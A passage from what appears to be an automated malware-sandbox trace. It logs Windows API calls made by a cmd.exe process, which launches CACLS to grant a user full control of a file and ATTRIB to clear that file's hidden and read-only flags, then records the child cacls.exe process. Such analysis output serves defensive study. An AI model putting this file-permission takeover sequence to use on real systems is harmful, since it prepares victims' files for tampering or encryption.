returned 0x0 [0189.139] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0189.139] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0189.139] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0189.139] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0189.139] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0189.139] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0189.139] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0189.139] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0189.139] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0189.139] GetEnvironmentStringsW () returned 0x412458* [0189.139] FreeEnvironmentStringsW (penv=0x412458) returned 1 [0189.139] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.139] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.139] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0189.139] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0189.139] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0189.139] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0189.139] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0189.139] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0189.139] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0189.140] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0189.140] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efb30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.140] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efb30, lpFilePart=0x2efb2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efb2c*="Desktop") 
returned 0x18 [0189.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.140] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef8ac | out: lpFindFileData=0x2ef8ac) returned 0x410ae8 [0189.140] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0189.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef8ac | out: lpFindFileData=0x2ef8ac) returned 0x410ae8 [0189.140] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0189.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef8ac | out: lpFindFileData=0x2ef8ac) returned 0x410ae8 [0189.140] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0189.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.140] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0189.140] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0189.141] GetEnvironmentStringsW () returned 0x410308* [0189.141] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.141] GetConsoleOutputCP () returned 0x1b5 [0189.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.141] GetUserDefaultLCID () returned 0x409 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efc70, cchData=128 | out: lpLCData="0") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efc70, cchData=128 | out: lpLCData="0") returned 2 [0189.142] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efc70, cchData=128 | out: lpLCData="1") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0189.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0189.142] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0189.143] GetConsoleTitleW (in: lpConsoleTitle=0x4009b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.143] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0189.143] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0189.143] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0189.144] GetEnvironmentVariableW (in: lpName="USERNAME", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0189.144] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0189.145] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0189.145] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0189.145] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0189.145] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0189.145] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0189.145] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0189.147] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0189.147] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0189.147] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0189.147] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0189.147] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0189.147] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0189.147] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0189.149] GetConsoleTitleW (in: lpConsoleTitle=0x2ef904, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.150] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.150] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.150] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.150] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.150] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.150] _wcsicmp 
(_String1="CACLS", _String2="DATE") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.150] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.150] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.150] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.150] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.150] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.150] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.150] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.150] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.150] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.150] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.150] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.150] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.150] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.150] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.150] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.150] 
_wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.150] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.150] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.150] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.151] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.151] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.151] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.151] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.151] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.151] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.151] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.151] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.151] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.151] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.151] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.151] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.151] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.151] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.151] 
_wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.151] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.151] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.151] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.151] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.151] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.151] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.151] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.151] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.151] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.151] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.151] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0189.151] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0189.151] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0189.152] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0189.152] SetErrorMode (uMode=0x0) returned 0x0 [0189.152] SetErrorMode (uMode=0x1) returned 0x0 [0189.152] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x411e98, lpFilePart=0x2ef424 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef424*="Desktop") returned 0x18 [0189.152] SetErrorMode (uMode=0x0) returned 0x1 [0189.152] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.152] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.157] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.158] GetLastError () returned 0x2 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.158] GetLastError () returned 0x2 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x412180 [0189.158] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.158] GetLastError () returned 0x2 [0189.158] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x412180 [0189.159] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0189.159] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.159] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.159] GetConsoleTitleW (in: lpConsoleTitle=0x2ef698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.159] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef520, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef5e8 | out: lpAttributeList=0x2ef520, lpSize=0x2ef5e8) returned 1 [0189.159] 
UpdateProcThreadAttribute (in: lpAttributeList=0x2ef520, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef5e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef520, lpPreviousValue=0x0) returned 1 [0189.159] GetStartupInfoW (in: lpStartupInfo=0x2ef4dc | out: lpStartupInfo=0x2ef4dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.159] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.160] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef57c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef5c8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2ef5c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf98, dwThreadId=0x7ec)) returned 1 [0189.162] CloseHandle (hObject=0x4c) returned 1 [0189.162] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.162] GetEnvironmentStringsW () returned 0x410308* [0189.162] 
FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.163] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0189.196] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef4bc | out: lpExitCode=0x2ef4bc*=0x0) returned 1 [0189.196] CloseHandle (hObject=0x50) returned 1 [0189.196] _vsnwprintf (in: _Buffer=0x2ef604, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef4c8 | out: _Buffer="00000000") returned 8 [0189.196] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.196] GetEnvironmentStringsW () returned 0x412410* [0189.196] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.196] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.196] GetEnvironmentStringsW () returned 0x412410* [0189.196] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.196] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef520 | out: lpAttributeList=0x2ef520) [0189.196] GetConsoleTitleW (in: lpConsoleTitle=0x2ef904, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.197] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.197] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.197] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.197] GetLastError () returned 0x2 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.197] GetLastError () returned 0x2 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x40e4d8 [0189.197] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0189.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0xffffffff [0189.198] GetLastError () returned 0x2 [0189.198] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef1a0) returned 0x40e4d8 [0189.198] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0189.198] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.198] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.198] GetConsoleTitleW (in: lpConsoleTitle=0x2ef698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.198] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef520, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef5e8 | out: lpAttributeList=0x2ef520, lpSize=0x2ef5e8) returned 1 [0189.198] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef520, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef5e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef520, lpPreviousValue=0x0) returned 1 [0189.198] GetStartupInfoW (in: lpStartupInfo=0x2ef4dc | out: lpStartupInfo=0x2ef4dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.198] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.198] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef57c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef5c8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessInformation=0x2ef5c8*(hProcess=0x4c, hThread=0x50, dwProcessId=0x828, dwThreadId=0xfdc)) returned 1 [0189.200] CloseHandle (hObject=0x50) returned 1 [0189.200] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.200] GetEnvironmentStringsW () returned 0x412410* [0189.201] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.201] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.239] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef4bc | out: lpExitCode=0x2ef4bc*=0x0) returned 1 [0189.239] CloseHandle (hObject=0x4c) returned 1 [0189.239] _vsnwprintf (in: _Buffer=0x2ef604, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef4c8 | out: _Buffer="00000000") returned 8 [0189.239] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") 
returned 1 [0189.239] GetEnvironmentStringsW () returned 0x412410* [0189.240] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.240] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.240] GetEnvironmentStringsW () returned 0x412410* [0189.240] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.240] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef520 | out: lpAttributeList=0x2ef520) [0189.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.240] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.240] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.240] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.240] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.240] SetConsoleInputExeNameW () returned 0x1 [0189.240] GetConsoleOutputCP () returned 0x1b5 [0189.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.240] exit (_Code=0) Process: id = "410" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xf98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "409" os_parent_pid = "0x114" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT 
